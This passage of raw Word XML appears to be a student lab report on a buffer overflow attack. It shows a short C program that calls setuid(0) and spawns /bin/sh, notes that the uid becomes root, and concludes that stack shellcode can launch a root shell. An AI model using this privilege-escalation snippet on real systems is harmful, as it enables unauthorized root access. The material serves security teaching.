          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>To set the uid to 0 run the below program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C507D" w14:textId="77777777" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">void main() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED1A793" w14:textId="77777777" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787DE46" w14:textId="77777777" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2445AF48" w14:textId="77777777" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system("/bin/sh");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC2603" w14:textId="206234F9" w:rsidR="003B65FF" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729709CC" w14:textId="35727328" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="009427C2" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02B8A8D1" wp14:editId="013100E5">
            <wp:extent cx="461010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100" cy="2476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22301142" w14:textId="23F3A155" w:rsidR="007E4FDD" w:rsidRPr="000941B1" w:rsidRDefault="007E4FDD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">After executing the above </w:t>
      </w:r>
      <w:r w:rsidR="000941B1" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>code,</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:r w:rsidR="009427C2" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>can observe that the uid=0 (root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0F58A2" w14:textId="13032715" w:rsidR="009427C2" w:rsidRPr="000941B1" w:rsidRDefault="009427C2" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52BC8B14" wp14:editId="1C71452E">
            <wp:extent cx="5943600" cy="3396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96615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFF1808" w14:textId="2749EF15" w:rsidR="001C6D52" w:rsidRPr="000941B1" w:rsidRDefault="001C6D52" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212D4DE5" w14:textId="62121B1D" w:rsidR="001C6D52" w:rsidRPr="000941B1" w:rsidRDefault="001C6D52" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA707F7" w14:textId="2BFF39BD" w:rsidR="001C6D52" w:rsidRDefault="001C6D52" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: After conducting the buffer overflow attack project we conclude that using simple C programs and passing the shellcode into the stack we can achieve the buffer overflow and then exploit it to launch the root shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7956CFF6" w14:textId="1072B439" w:rsidR="009979D3" w:rsidRDefault="009979D3" w:rsidP="009979D3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009979D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Buffer overflows are the result of poor memory management in languages like C – even the best programmers sometimes make mistakes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009979D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Buffer overflow attacks exploit these to over write memory values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009979D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This often lets an attack execute arbitrary code.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B78B1FF" w14:textId="77F185F4" w:rsidR="009979D3" w:rsidRPr="000941B1" w:rsidRDefault="009979D3" w:rsidP="009979D3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Buffer Overflow attacks can be prevented by using ideal techniques to write a program and implementing security mechanisms to prevent such attacks.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009979D3" w:rsidRPr="000941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D25E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74926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8D733D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50E25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775D32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9683C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9A0C7D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3407D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AA3D36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5388F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A328E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5C0CBD12"/>
    <w:lvl w:ilvl="0" w:tplc="E7540210">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>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16024E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="306E5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EC5A14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0FAEE19A"/>
    <w:lvl w:ilvl="0" w:tplc="3E1E5F80">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CB04D67"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9306C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7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>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5FF"/>
    <w:rsid w:val="00025F2B"/>
    <w:rsid w:val="00076171"/>
    <w:rsid w:val="00085B80"/>
    <w:rsid w:val="000941B1"/>
    <w:rsid w:val="000D2070"/>
    <w:rsid w:val="0012099B"/>
    <w:rsid w:val="001564A4"/>
    <w:rsid w:val="00186184"/>
    <w:rsid w:val="001C6D52"/>
    <w:rsid w:val="001D7DC2"/>
    <w:rsid w:val="002465BD"/>
    <w:rsid w:val="0027147C"/>
    <w:rsid w:val="002C744B"/>
    <w:rsid w:val="003A4026"/>
    <w:rsid w:val="003B65FF"/>
    <w:rsid w:val="00477170"/>
    <w:rsid w:val="00494E74"/>
    <w:rsid w:val="004E607D"/>
    <w:rsid w:val="00553AAD"/>
    <w:rsid w:val="0056636B"/>
    <w:rsid w:val="0058424D"/>
    <w:rsid w:val="00667EC0"/>
    <w:rsid w:val="0069567B"/>
    <w:rsid w:val="006E1465"/>
    <w:rsid w:val="00724226"/>
    <w:rsid w:val="007E4FDD"/>
    <w:rsid w:val="00831FCF"/>
    <w:rsid w:val="00833FC9"/>
    <w:rsid w:val="008806FB"/>
    <w:rsid w:val="00893DE6"/>
    <w:rsid w:val="009427C2"/>
    <w:rsid w:val="009979D3"/>
    <w:rsid w:val="009B249C"/>
    <w:rsid w:val="00A10DF8"/>
    <w:rsid w:val="00A3420C"/>
    <w:rsid w:val="00AB20EF"/>
    <w:rsid w:val="00AB6048"/>
    <w:rsid w:val="00AD56B5"/>
    <w:rsid w:val="00AF71CF"/>
    <w:rsid w:val="00B743A4"/>
    <w:rsid w:val="00B82992"/>
    <w:rsid w:val="00BC78AD"/>
    <w:rsid w:val="00C43A1E"/>
    <w:rsid w:val="00CF716E"/>
    <w:rsid w:val="00D80508"/>
    <w:rsid w:val="00D82E4D"/>
    <w:rsid w:val="00E250CA"/>
    <w:rsid w:val="00E32B1F"/>
    <w:rsid w:val="00EC21B1"/>
    <w:rsid w:val="00F17B80"/>
    <w:rsid w:val="00FB6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49921"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{96DDA066-BA7C-4EC8-BF9E-D632695A2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806F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714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613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977</TotalTime>
  <Pages>16</Pages>
  <Words>1889</Words>
  <Characters>10773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Kannatti</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Manjula Kannatti</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-18T17:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-22T03:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>